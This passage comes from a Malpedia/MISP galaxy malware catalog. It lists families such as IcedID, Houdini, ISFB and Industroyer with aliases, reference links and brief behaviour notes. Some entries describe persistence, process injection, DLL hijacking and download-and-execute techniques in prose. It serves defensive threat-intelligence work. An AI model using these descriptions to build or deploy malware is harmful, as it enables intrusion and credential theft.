HLUX is also known as:

*Table 1876. Table References*

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.hlux">https://malpedia.caad.fkie.fraunhofer.de/details/win.hlux</a></td>
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**Holcus Installer (Adware)**

Adware, tied to eGobbler and Nephos7 campaigns,

The tag is: `misp-galaxy:malpedia="Holcus Installer (Adware)"`

Holcus Installer (Adware) is also known as:

*Table 1877. Table References*

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.holcus">https://malpedia.caad.fkie.fraunhofer.de/details/win.holcus</a></td>
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<td><a href="https://blog.confiant.com/malvertising-made-in-china-f5081521b3f0">https://blog.confiant.com/malvertising-made-in-china-f5081521b3f0</a></td>
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</table>

**homefry**

A 64-bit Windows password dumper/cracker that has previously been used in conjunction with AIRBREAK and BADFLICK backdoors. Some strings are obfuscated with XOR x56. The malware accepts up to two arguments at the command line: one to display cleartext credentials for each login session, and a second to display cleartext credentials, NTLM hashes, and malware version for each login session.

The tag is: `misp-galaxy:malpedia="homefry"`

homefry is also known as:

*Table 1878. Table References*

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**HookInjEx**

The tag is: *misp-galaxy:malpedia="HookInjEx"*

HookInjEx is also known as:

*Table 1879. Table References*

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<td><a href="https://research.checkpoint.com/2020/rampant-kitten-an-iranian-espionage-campaign/">https://research.checkpoint.com/2020/rampant-kitten-an-iranian-espionage-campaign/</a></td>
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</table>

**HOPLIGHT**

The tag is: *misp-galaxy:malpedia="HOPLIGHT"*

HOPLIGHT is also known as:

- **HANGMAN**

*Table 1880. Table References*

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<td><a href="https://www.us-cert.gov/ncas/analysis-reports/ar20-045g">https://www.us-cert.gov/ncas/analysis-reports/ar20-045g</a></td>
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<td><a href="https://www.us-cert.gov/ncas/analysis-reports/AR19-100A">https://www.us-cert.gov/ncas/analysis-reports/AR19-100A</a></td>
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<tr>
<td><a href="https://www.us-cert.gov/ncas/analysis-reports/ar19-304a">https://www.us-cert.gov/ncas/analysis-reports/ar19-304a</a></td>
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<tr>
<td><a href="https://www.secureworks.com/research/threat-profiles/nickel-academy">https://www.secureworks.com/research/threat-profiles/nickel-academy</a></td>
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<tr>
<td><a href="https://www.computing.co.uk/ctg/news/3074007/lazarus-rises-warning-over-new-hoplight-malware-linked-with-north-korea">https://www.computing.co.uk/ctg/news/3074007/lazarus-rises-warning-over-new-hoplight-malware-linked-with-north-korea</a></td>
</tr>
<tr>
<td><a href="https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus(Constellation).pdf">https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus(Constellation).pdf</a></td>
</tr>
<tr>
<td><a href="https://researchcenter.paloaltonetworks.com/2017/08/unit42-blockbuster-saga-continues/">https://researchcenter.paloaltonetworks.com/2017/08/unit42-blockbuster-saga-continues/</a></td>
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</table>
Hopscotch

Hopscotch is part of the Regin framework.

The tag is: misp-galaxy:malpedia="Hopscotch"

Hopscotch is also known as:

Table 1881. Table References

<table>
<thead>
<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.hopscotch">https://malpedia.caad.fkie.fraunhofer.de/details/win.hopscotch</a></td>
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<tr>
<td><a href="https://www.youtube.com/watch?v=VnzP00DZlx4">https://www.youtube.com/watch?v=VnzP00DZlx4</a></td>
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</table>

HorusEyes RAT

Remote Acess Tool Written in VB.NET.

The tag is: misp-galaxy:malpedia="HorusEyes RAT"

HorusEyes RAT is also known as:

Table 1882. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.horuseyes">https://malpedia.caad.fkie.fraunhofer.de/details/win.horuseyes</a></td>
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<tr>
<td><a href="https://github.com/arsium/HorusEyesRat_Public">https://github.com/arsium/HorusEyesRat_Public</a></td>
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HOTCROISSANT

The tag is: misp-galaxy:malpedia="HOTCROISSANT"

HOTCROISSANT is also known as:

Table 1883. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.hotcroissant">https://malpedia.caad.fkie.fraunhofer.de/details/win.hotcroissant</a></td>
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<tr>
<td><a href="https://www.us-cert.gov/ncas/analysis-reports/ar20-045d">https://www.us-cert.gov/ncas/analysis-reports/ar20-045d</a></td>
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</table>

HOTWAX

HOTWAX is a module that upon starting imports all necessary system API functions, and searches for a .CHM file. HOTWAX decrypts a payload using the Spritz algorithm with a hard-coded key and
then searches the target process and attempts to inject the decrypted payload module from the CHM file into the address space of the target process.

The tag is: `misp-galaxy:malpedia="HOTWAX"`

**HOTWAX** is also known as:

**Table 1884. Table References**

<table>
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<th>Links</th>
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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.hotwax">https://malpedia.caad.fkie.fraunhofer.de/details/win.hotwax</a></td>
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<tr>
<td><a href="https://content.fireeye.com/apt/rpt-apt38">https://content.fireeye.com/apt/rpt-apt38</a></td>
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<tr>
<td><a href="https://www.welivesecurity.com/2017/02/16/demystifying-targeted-malware-used-polish-banks/">https://www.welivesecurity.com/2017/02/16/demystifying-targeted-malware-used-polish-banks/</a></td>
</tr>
</tbody>
</table>

**Houdini**

Houdini is a VBS-based RAT dating back to 2013. Past in the days, it used to be wrapped in an .exe but started being spamvertized or downloaded by other malware directly as .vbs in 2018. In 2019, WSHRAT appeared, a Javascript-based version of Houdini, recoded by the name of Kognito.

The tag is: `misp-galaxy:malpedia="Houdini"`

**Houdini** is also known as:

- Hworm
- Jenxcus
- Kognito
- Njw0rm
- WSHRAT
- dinihou
- dunihi

**Table 1885. Table References**

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<thead>
<tr>
<th>Links</th>
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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.houdini">https://malpedia.caad.fkie.fraunhofer.de/details/win.houdini</a></td>
</tr>
<tr>
<td><a href="https://unit42.paloaltonetworks.com/unit42-houdinis-magic-reappearance/">https://unit42.paloaltonetworks.com/unit42-houdinis-magic-reappearance/</a></td>
</tr>
<tr>
<td><a href="https://www.fireeye.com/blog/threat-research/2013/09/now-you-see-me-h-worm-by-houdini.html">https://www.fireeye.com/blog/threat-research/2013/09/now-you-see-me-h-worm-by-houdini.html</a></td>
</tr>
<tr>
<td><a href="https://www.youtube.com/watch?v=h3KLKCdMUUY">https://www.youtube.com/watch?v=h3KLKCdMUUY</a></td>
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HtBot

The tag is: *misp-galaxy:malpedia*="HtBot"

HtBot is also known as:

*Table 1886. Table References*

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.htbot">https://malpedia.caad.fkie.fraunhofer.de/details/win.htbot</a></td>
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htpRAT

The tag is: *misp-galaxy:malpedia*="htpRAT"

htpRAT is also known as:

*Table 1887. Table References*

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.htprat">https://malpedia.caad.fkie.fraunhofer.de/details/win.htprat</a></td>
</tr>
<tr>
<td><a href="https://www.riskiq.com/blog/labs/htprat/">https://www.riskiq.com/blog/labs/htprat/</a></td>
</tr>
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</table>

HTran

The tag is: *misp-galaxy:malpedia*="HTran"

HTran is also known as:

- HUC Packet Transmit Tool

*Table 1888. Table References*

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HttpBrowser

The tag is: misp-galaxy:malpedia="HttpBrowser"

HttpBrowser is also known as:

- HttpDump

Table 1889. Table References

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<th>Links</th>
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<tbody>
<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.httpbrowser">https://malpedia.caad.fkie.fraunhofer.de/details/win.httpbrowser</a></td>
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<tr>
<td><a href="https://www.secureworks.com/research/threat-profiles/bronze-union">https://www.secureworks.com/research/threat-profiles/bronze-union</a></td>
</tr>
<tr>
<td><a href="https://threatconnect.com/blog/the-anthem-hack-all-roads-lead-to-china/">https://threatconnect.com/blog/the-anthem-hack-all-roads-lead-to-china/</a></td>
</tr>
</tbody>
</table>

httpdropper

The tag is: misp-galaxy:malpedia="httpdropper"

httpdropper is also known as:

- httpdr0pper

Table 1890. Table References
http_troy

The tag is: misp-galaxy:malpedia="http_troy"

http_troy is also known as:

Table 1891. Table References

Links


Hunter Stealer

The tag is: misp-galaxy:malpedia="Hunter Stealer"

Hunter Stealer is also known as:

Table 1892. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.hunter
https://twitter.com/3xp0rtblog/status/1324800226381758471

Hupigon

The tag is: misp-galaxy:malpedia="Hupigon"

Hupigon is also known as:

Table 1893. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.hupigon
**Hussar**

The tag is: `misp-galaxy:malpedia="Hussar"`

Hussar is also known as:

*Table 1894. Table References*

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.hussar">https://malpedia.caad.fkie.fraunhofer.de/details/win.hussar</a></td>
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**HxDef**

The tag is: `misp-galaxy:malpedia="HxDef"`

HxDef is also known as:

- HacDef
- HackDef
- HackerDefender

*Table 1895. Table References*

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win">https://malpedia.caad.fkie.fraunhofer.de/details/win</a> hxdef</td>
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**HyperBro**

The tag is: `misp-galaxy:malpedia="HyperBro"`

HyperBro is also known as:

*Table 1896. Table References*

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.hyperbro">https://malpedia.caad.fkie.fraunhofer.de/details/win.hyperbro</a></td>
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<tr>
<td><a href="https://www.secureworks.com/research/a-peek-into-bronze-unions-toolbox">https://www.secureworks.com/research/a-peek-into-bronze-unions-toolbox</a></td>
</tr>
</tbody>
</table>
IcedID

Analysis Observations:

- It sets up persistence by creating a Scheduled Task with the following characteristics:
  - Name: Update
  - Trigger: At Log on
  - Action: %LocalAppData%\Example\waroupada.exe /i
  - Conditions: Stop if the computer ceases to be idle.

- The sub-directory within %LocalAppdata%, Appears to be randomly picked from the list of directories within %ProgramFiles%. This needs more verification.

- The filename remained static during analysis.

- The original malware exe (ex. waroupada.exe) will spawn an instance of svchost.exe as a sub-process and then inject/execute its malicious code within it

- If “/i” is not passed as an argument, it sets up persistence and waits for reboot.

- If “/I” is passed as an argument (as is the case when the scheduled task is triggered at login), it skips persistence setup and actually executes; resulting in C2 communication.

- Employs an interesting method for sleeping by calling the Sleep function of kernel32.dll from the shell, like so: rundll32.exe kernel32,Sleep -s

- Setup a local listener to proxy traffic on 127.0.0.1:50000

IcedID is also known as:

- BokBot
- IceID

Table 1897. Table References

<table>
<thead>
<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.icedid">https://malpedia.caad.fkie.fraunhofer.de/details/win.icedid</a></td>
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<tr>
<td><a href="https://www.youtube.com/watch?v=wObF9n2UIAM">https://www.youtube.com/watch?v=wObF9n2UIAM</a></td>
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<td><a href="https://elis531989.medium.com/funtastic-packers-and-where-to-find-them-41429a7ef9a7">https://elis531989.medium.com/funtastic-packers-and-where-to-find-them-41429a7ef9a7</a></td>
</tr>
<tr>
<td><a href="https://unit42.paloaltonetworks.com/wireshark-tutorial-emotet-infection/">https://unit42.paloaltonetworks.com/wireshark-tutorial-emotet-infection/</a></td>
</tr>
<tr>
<td><a href="https://www.fortinet.com/blog/threat-research/icedid-malware-analysis-part-two.html">https://www.fortinet.com/blog/threat-research/icedid-malware-analysis-part-two.html</a></td>
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IcedID Downloader

The tag is: misp-galaxy:malpedia="IcedID Downloader"

IcedID Downloader is also known as:

Table 1898. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.icedid_downloader">https://malpedia.caad.fkie.fraunhofer.de/details/win.icedid_downloader</a></td>
</tr>
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Icefog

The tag is: misp-galaxy:malpedia="Icefog"

Icefog is also known as:

- Fucobha

Table 1899. Table References

Links

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.icefog">https://malpedia.caad.fkie.fraunhofer.de/details/win.icefog</a></td>
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</table>

762
Ice IX

The ICE IX bot is a banking trojan derived of the Zeus botnet because it uses significant parts of Zeus’s source code. ICE IX communicates using the HTTP protocol, so it can be considered to be a third-generation botnet. While it has been used for a variety of purposes, a primary threat of ICE IX comes from its manipulation of banking operations on compromised machines. As with any bot, execution of the bot results in establishing a master-slave relationship between the botmaster and the compromised computer.

The tag is: `misp-galaxy:malpedia="Ice IX"`

Ice IX is also known as:

Table 1900. Table References

<table>
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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.ice_ix">https://malpedia.caad.fkie.fraunhofer.de/details/win.ice_ix</a></td>
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<tr>
<td><a href="https://securelist.com/ice-ix-the-first-crimeware-based-on-the-leaked-zeus-sources/29577/">https://securelist.com/ice-ix-the-first-crimeware-based-on-the-leaked-zeus-sources/29577/</a></td>
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<tr>
<td><a href="https://securelist.com/ice-ix-not-cool-at-all/29111/">https://securelist.com/ice-ix-not-cool-at-all/29111/</a></td>
</tr>
<tr>
<td><a href="https://www.virusbulletin.com/virusbulletin/2012/08/inside-ice-ix-bot-descendent-zeus">https://www.virusbulletin.com/virusbulletin/2012/08/inside-ice-ix-bot-descendent-zeus</a></td>
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IconDown

The tag is: `misp-galaxy:malpedia="IconDown"`

IconDown is also known as:

Table 1901. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.icondown">https://malpedia.caad.fkie.fraunhofer.de/details/win.icondown</a></td>
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IcyHeart

The tag is: `misp-galaxy:malpedia="IcyHeart"`
IcyHeart is also known as:

- Troxen

**Table 1902. Table References**

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**IDKEY**

The tag is: `misp-galaxy:malpedia=“IDKEY”`

IDKEY is also known as:

**Table 1903. Table References**

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.idkey">https://malpedia.caad.fkie.fraunhofer.de/details/win.idkey</a></td>
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<td><a href="https://isc.sans.edu/diary/22766">https://isc.sans.edu/diary/22766</a></td>
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**IISniff**

The tag is: `misp-galaxy:malpedia=“IISniff”`

IISniff is also known as:

**Table 1904. Table References**

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**Imecab**

The tag is: `misp-galaxy:malpedia=“Imecab”`

Imecab is also known as:

**Table 1905. Table References**

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**Imminent Monitor RAT**

The tag is: *misp-galaxy:malpedia="Imminent Monitor RAT"*

Imminent Monitor RAT is also known as:

*Table 1906. Table References*

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.imminent_monitor_rat">https://malpedia.caad.fkie.fraunhofer.de/details/win.imminent_monitor_rat</a></td>
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<tr>
<td><a href="https://www.secureworks.com/research/threat-profiles/cobalt-trinity">https://www.secureworks.com/research/threat-profiles/cobalt-trinity</a></td>
</tr>
<tr>
<td><a href="https://unit42.paloaltonetworks.com/imminent-monitor-a-rat-down-under/">https://unit42.paloaltonetworks.com/imminent-monitor-a-rat-down-under/</a></td>
</tr>
<tr>
<td><a href="https://itsjack.cc/blog/2016/01/imminent-monitor-4-rat-analysis-a-glance/">https://itsjack.cc/blog/2016/01/imminent-monitor-4-rat-analysis-a-glance/</a></td>
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**Immortal Stealer**

The tag is: *misp-galaxy:malpedia="Immortal Stealer"*

*Immortal Stealer is also known as:*

*Table 1907. Table References*

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.immortal_stealer">https://malpedia.caad.fkie.fraunhofer.de/details/win.immortal_stealer</a></td>
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<td><a href="https://www.zscaler.com/blogs/research/immortal-information-stealer">https://www.zscaler.com/blogs/research/immortal-information-stealer</a></td>
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**IndigoDrop**

The tag is: *misp-galaxy:malpedia="IndigoDrop"*

IndigoDrop is also known as:

*Table 1908. Table References*

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.indigodrop">https://malpedia.caad.fkie.fraunhofer.de/details/win.indigodrop</a></td>
</tr>
<tr>
<td><a href="https://blog.talosintelligence.com/2020/06/indigodrop-maldocs-cobalt-strike.html">https://blog.talosintelligence.com/2020/06/indigodrop-maldocs-cobalt-strike.html</a></td>
</tr>
</tbody>
</table>
**Industroyer**

Industroyer is a malware framework considered to have been used in the cyberattack on Ukraine's power grid on December 17, 2016. The attack cut a fifth of Kiev, the capital, off power for one hour. It is the first ever known malware specifically designed to attack electrical grids.

The tag is: `misp-galaxy:malpedia="Industroyer"`

Industroyer is also known as:

- Crash
- CrashOverride

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**Table 1909. Table References**

<table>
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<tr>
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<tbody>
<tr>
<td><a href="https://dragos.com/blog/crashoverride/CrashOverride-01.pdf">https://dragos.com/blog/crashoverride/CrashOverride-01.pdf</a></td>
</tr>
<tr>
<td><a href="https://www.secureworks.com/research/threat-profiles/iron-viking">https://www.secureworks.com/research/threat-profiles/iron-viking</a></td>
</tr>
<tr>
<td><a href="https://www.welivesecurity.com/2017/06/12/industroyer-biggest-threat-industrial-control-systems-since-stuxnet/">https://www.welivesecurity.com/2017/06/12/industroyer-biggest-threat-industrial-control-systems-since-stuxnet/</a></td>
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**Inferno**

The tag is: `misp-galaxy:malpedia="Inferno"`
Inferno is also known as:

Table 1910. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.inferno">https://malpedia.caad.fkie.fraunhofer.de/details/win.inferno</a></td>
</tr>
<tr>
<td><a href="https://github.com/LimerBoy/Inferno">https://github.com/LimerBoy/Inferno</a></td>
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**InfoDot Ransomware**

The tag is: misp-galaxy:malpedia="InfoDot Ransomware"

InfoDot Ransomware is also known as:

Table 1911. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.infodot">https://malpedia.caad.fkie.fraunhofer.de/details/win.infodot</a></td>
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<tr>
<td><a href="https://id-ransomware.blogspot.com/2019/10/infodot-ransomware.html">https://id-ransomware.blogspot.com/2019/10/infodot-ransomware.html</a></td>
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**Infy**

The tag is: misp-galaxy:malpedia="Infy"

Infy is also known as:

- Foudre

Table 1912. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.infy">https://malpedia.caad.fkie.fraunhofer.de/details/win.infy</a></td>
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<td><a href="http://researchcenter.paloaltonetworks.com/2016/06/unit42-prince-of-persia-game-over/">http://researchcenter.paloaltonetworks.com/2016/06/unit42-prince-of-persia-game-over/</a></td>
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<td><a href="https://cloud.tencent.com/developer/article/1738806">https://cloud.tencent.com/developer/article/1738806</a></td>
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<tr>
<td><a href="https://research.checkpoint.com/2021/after-lightning-comes-thunder/">https://research.checkpoint.com/2021/after-lightning-comes-thunder/</a></td>
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</tbody>
</table>
InnaputRAT

InnaputRAT, a RAT capable of exfiltrating files from victim machines, was distributed by threat actors using phishing and Godzilla Loader. The RAT has evolved through multiple variants dating back to 2016. Recent campaigns distributing InnaputRAT beaconed to live C2 as of March 26, 2018.

The tag is: misp-galaxy:malpedia="InnaputRAT"

InnaputRAT is also known as:

Table 1913. Table References

Links

- https://malpedia.caad.fkie.fraunhofer.de/details/win.innaput RAT
- https://asert.arbornetworks.com/innaput-actors-utilize-remote-access-trojan-since-2016-presumably-targeting-victim-files/

win.innfirat

InnifiRAT is coded in .NET and targets personal data on infected devices, with it’s top priority appearing to be bitcoin and litecoin wallet data.

InnifiRAT also includes a backdoor which allows attackers to control the infected host remotely. Possibilities include loggin key stroke, taking pictures with webcam, accessing confidential information, formatting drives, and more.

It attempts to steal browser cookies to steal usernames and passwords and monitors the users activities with screenshot functionality.

The tag is: misp-galaxy:malpedia="win.innfirat"

win.innfirat is also known as:

Table 1914. Table References

Links

- https://malpedia.caad.fkie.fraunhofer.de/details/win.innfirat

Interception

ESET noticed attacks against aerospace and military companies in Europe and the Middle East that took place between September and December 2019, which featured this family. They found a number of hints that points towards Lazarus as potential origin.
Interception is also known as:

Table 1915. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.interception">https://malpedia.caad.fkie.fraunhofer.de/details/win.interception</a></td>
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**InvisiMole**

InvisiMole had a modular architecture, starting with a wrapper DLL, and performing its activities using two other modules that were embedded in its resources, named RC2FM and RC2CL. They were feature-rich backdoors and turned the affected computer into a video camera, letting the attackers to spy the victim. The malicious actors behind this malware were active at least since 2013 in highly targeted campaigns with only a few dozen compromised computers in Ukraine and Russia. The wrapper DLL posed as a legitimate mpr.dll library and was placed in the same folder as explorer.exe, which made it being loaded during the Windows startup into the Windows Explorer process instead of the legitimate library. Malware came in both 32-bit and 64-bit versions, which made this persistence technique functional on both architectures.

The smaller of the modules, RC2FM, contained a backdoor with fifteen supported commands indexed by numbers. The commands could perform simple changes on the system and spying features like capturing sounds, taking screenshots or monitoring all fixed and removable drives.

The second module, RC2CL, offered features for collecting as much data about the infected computer as possible, rather than for making system changes. The module supported up to 84 commands such as file system operations, file execution, registry key manipulation, remote shell activation, wireless network scanning, listing of installed software etc. Though the backdoor was capable of interfering with the system (e.g. to log off a user, terminate a process or shut down the system), it mostly provided passive operations. Whenever possible, it tried to hide its activities by restoring the original file access time or safe-deleting its traces.

InvisiMole is also known as:

Table 1916. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.invisimole">https://malpedia.caad.fkie.fraunhofer.de/details/win.invisimole</a></td>
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**Ironcat**

The tag is: *misp-galaxy:malpedia=“Ironcat”*

Ironcat is also known as:

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<tr>
<td><a href="https://aaronrosenmund.com/blog/2020/09/26/ironcat-ransmoware/">https://aaronrosenmund.com/blog/2020/09/26/ironcat-ransmoware/</a></td>
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<td><a href="https://twitter.com/demonslay335/status/1308827693312548864">https://twitter.com/demonslay335/status/1308827693312548864</a></td>
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**IRONHALO**

IRONHALO is a downloader that uses the HTTP protocol to retrieve a Base64 encoded payload from a hard-coded command-and-control (CnC) server and uniform resource locator (URL) path. The encoded payload is written to a temporary file, decoded and executed in a hidden window. The encoded and decoded payloads are written to files named igfxHK[%rand%].dat and igfxHK[%rand%].exe respectively, where [%rand%] is a 4-byte hexadecimal number based on the current timestamp. It persists by copying itself to the current user’s Startup folder.

The tag is: *misp-galaxy:malpedia=“IRONHALO”*

IRONHALO is also known as:

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<td><a href="https://www.fireeye.com/blog/threat-research/2015/12/the_eps_awakens.html">https://www.fireeye.com/blog/threat-research/2015/12/the_eps_awakens.html</a></td>
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<td><a href="https://www.fireeye.com/blog/threat-research/2015/12/the-eps-awakens-part-two.html">https://www.fireeye.com/blog/threat-research/2015/12/the-eps-awakens-part-two.html</a></td>
</tr>
</tbody>
</table>

**ISFB**

2006 Gozi v1.0, Gozi CRM, CRM, Papras 2010 Gozi v2.0, Gozi ISFB, ISFB, Pandemyia(*)

In September 2010, the source code of a particular Gozi CRM dll version was leaked. This led to two main branches: one became known as Gozi Prinimalka, which was merge with Pony and became Vawtrak/Neverquest.
The other branch became known as Gozi ISFB, or ISFB in short. Webinject functionality was added to this version.

There is one panel which often was used in combination with ISFB: IAP. The panel's login page comes with the title 'Login - IAP'. The body contains 'AUTHORIZED', 'Name:', 'Password:' and a single button 'Sign in' in a minimal design. Often, the panel is directly accessible by entering the C2 IP address in a browser. But there are ISFB versions which are not directly using IAP. The bot accesses a gate, which is called the 'Dreambot' gate. See win.dreambot for further information.

ISFB often was protected by Rovnix. This led to a further complication in the naming scheme - many companies started to call ISFB Rovnix. Because the signatures started to look for Rovnix, other trojans protected by Rovnix (in particular ReactorBot and Rerdom) sometimes got wrongly labelled.

In April 2016 a combination of Gozi ISFB and Nymaim was detected. This breed became known as GozNym. The merge uses a shellcode-like version of Gozi ISFB, that needs Nymaim to run. The C2 communication is performed by Nymaim.

See win.gozi for additional historical information.

The tag is: misp-galaxy:malpedia="ISFB"

ISFB is also known as:

- Gozi ISFB
- IAP
- Pandemyia

Table 1919. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.isfb">https://malpedia.caad.fkie.fraunhofer.de/details/win.isfb</a></td>
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<td><a href="https://www.fortinet.com/blog/threat-research/new-variant-of-ursnif-continuously-targeting-italy">https://www.fortinet.com/blog/threat-research/new-variant-of-ursnif-continuously-targeting-italy</a></td>
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<td><a href="https://blog.talosintelligence.com/2019/01/amp-tracks-ursnif.html">https://blog.talosintelligence.com/2019/01/amp-tracks-ursnif.html</a></td>
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<td><a href="https://localhost.pl/gozi_tree.txt">https://localhost.pl/gozi_tree.txt</a></td>
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<td><a href="https://isc.sans.edu/forums/diary/Reviewing+the+spam+filters+Malspam+pushing+GoziISFB/23245">https://isc.sans.edu/forums/diary/Reviewing+the+spam+filters+Malspam+pushing+GoziISFB/23245</a></td>
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https://www.cyarbit.com/new-ursnif-malware-variant/
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https://0xc0decafe.com/malware-analysts-guide-to-aplib-decompression/
https://www.youtube.com/watch?v=Jlc7Ahp81qg
https://blog.talosintelligence.com/2020/07/valak-emerges.html
https://0ffset.net/reverse-engineering/analyzing-com-mechanisms-in-malware/
https://isc.sans.edu/forums/diary/German+language+malspam+pushes+Ursnif/25732/
https://0ffset.net/reverse-engineering/malware-analysis/analyzing-isfb-second-loader/
https://unit42.paloaltonetworks.com/wireshark-tutorial-examining-ursnif-infections/
https://www.tgsoft.it/files/report/download.asp?id=568531345
https://blog.yoroi.company/research/the-ursnif-gangs-keep-threatening-italy/
https://0ffset.net/reverse-engineering/malware-analysis/analyising-isfb-loader/
The tag is: misp-galaxy:malpedia="ISMAgent"

ISMAgent is also known as:

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<td><a href="http://www.clearskyssec.com/ismagent/">http://www.clearskyssec.com/ismagent/</a></td>
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<td><a href="https://unit42.paloaltonetworks.com/dns-tunneling-in-the-wild-overview-of-oilrigs-dns-tunneling/">https://unit42.paloaltonetworks.com/dns-tunneling-in-the-wild-overview-of-oilrigs-dns-tunneling/</a></td>
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ISMDoor

The tag is: misp-galaxy:malpedia="ISMDoor"

ISMDoor is also known as:

Table 1921. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.ismdoor">https://malpedia.caad.fkie.fraunhofer.de/details/win.ismdoor</a></td>
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<tr>
<td><a href="http://www.clearskysec.com/greenbug/">http://www.clearskysec.com/greenbug/</a></td>
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iSpy Keylogger

The tag is: misp-galaxy:malpedia="iSpy Keylogger"

iSpy Keylogger is also known as:

Table 1922. Table References

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<td><a href="https://www.zscaler.com/blogs/research/ispy-keylogger">https://www.zscaler.com/blogs/research/ispy-keylogger</a></td>
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<tr>
<td><a href="https://www.secureworks.com/research/threat-profiles/gold-skyline">https://www.secureworks.com/research/threat-profiles/gold-skyline</a></td>
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IsraBye

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IsraBye is also known as:

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<td><a href="https://twitter.com/malwrhunterteam/status/1085162243795369984">https://twitter.com/malwrhunterteam/status/1085162243795369984</a></td>
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</tbody>
</table>
**ISR Stealer**

ISR Stealer is a modified version of the Hackhound Stealer. It is written in VB and often comes in a .NET-wrapper. ISR Stealer makes use of two Nirsoft tools: Mail PassView and WebBrowserPassView.

Incredibly, it uses an hard-coded user agent string: HardCore Software For: Public

The tag is: `misp-galaxy:malpedia=“ISR Stealer”`

ISR Stealer is also known as:

Table 1924. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.isr_stealer">https://malpedia.caad.fkie.fraunhofer.de/details/win.isr_stealer</a></td>
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<td><a href="https://securingtomorrow.mcafee.com/mcafee-labs/phishing-attacks-employ-old-effective-password-stealer/">https://securingtomorrow.mcafee.com/mcafee-labs/phishing-attacks-employ-old-effective-password-stealer/</a></td>
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**IsSpace**

The tag is: `misp-galaxy:malpedia=“IsSpace”`

IsSpace is also known as:

- NfLog RAT

Table 1925. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.isspace">https://malpedia.caad.fkie.fraunhofer.de/details/win.isspace</a></td>
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<td><a href="http://researchcenter.paloaltonetworks.com/2017/01/unit42-dragonok-updates-toolset-targets-multiple-geographic-regions/">http://researchcenter.paloaltonetworks.com/2017/01/unit42-dragonok-updates-toolset-targets-multiple-geographic-regions/</a></td>
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<td><a href="https://www.secureworks.com/research/threat-profiles/bronze-overbrook">https://www.secureworks.com/research/threat-profiles/bronze-overbrook</a></td>
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<td><a href="https://www.secureworks.com/research/threat-profiles/bronze-express">https://www.secureworks.com/research/threat-profiles/bronze-express</a></td>
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**IXWare**

The tag is: `misp-galaxy:malpedia=“IXWare”`

IXWare is also known as:

Table 1926. Table References
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https://malpedia.caad.fkie.fraunhofer.de/details/win.ixware
https://fr3d.hk/blog/ixware-kids-will-be-skids

**JackPOS**

The tag is: `misp-galaxy:malpedia="JackPOS"`

JackPOS is also known as:

*Table 1927. Table References*

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.jackpos">https://malpedia.caad.fkie.fraunhofer.de/details/win.jackpos</a></td>
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**Jaff**

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Jaff is also known as:

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<td><a href="https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/">https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/</a></td>
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**Jager Decryptor**

The tag is: `misp-galaxy:malpedia="Jager Decryptor"`

Jager Decryptor is also known as:

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**Jaku**

The tag is: `misp-galaxy:malpedia="Jaku"`
Jaku is also known as:

- C3PRO-RACOON
- KCNA Infostealer
- Reconcyc

Table 1930. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.jaku">https://malpedia.caad.fkie.fraunhofer.de/details/win.jaku</a></td>
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jason

Jason is a graphic tool implemented to perform Microsoft exchange account brute-force in order to “harvest” the highest possible emails and accounts information. Distributed in a ZIP container the interface is quite intuitive: the Microsoft exchange address and its version shall be provided. Three brute-force methods could be selected: EWS (Exchange Web Service), OAB (Offline Address Book) or both (All). Username and password list can be selected and threads number should be provided in order to optimize the attack balance.

The tag is: misp-galaxy:malpedia="jason"

jason is also known as:

Table 1931. Table References

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Jasus

The tag is: misp-galaxy:malpedia="Jasus"

Jasus is also known as:

Table 1932. Table References

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<td><a href="https://www.securelisted.com/whos-really-spreading-through-the-bright-star/68978/">https://www.securelisted.com/whos-really-spreading-through-the-bright-star/68978/</a></td>
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**J Cry**

Ransomware written in Go.

The tag is: misp-galaxy:malpedia="J Cry"

J Cry is also known as:

*Table 1933. Table References*

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**Jeno Ransomware**

The tag is: misp-galaxy:malpedia="Jeno Ransomware"

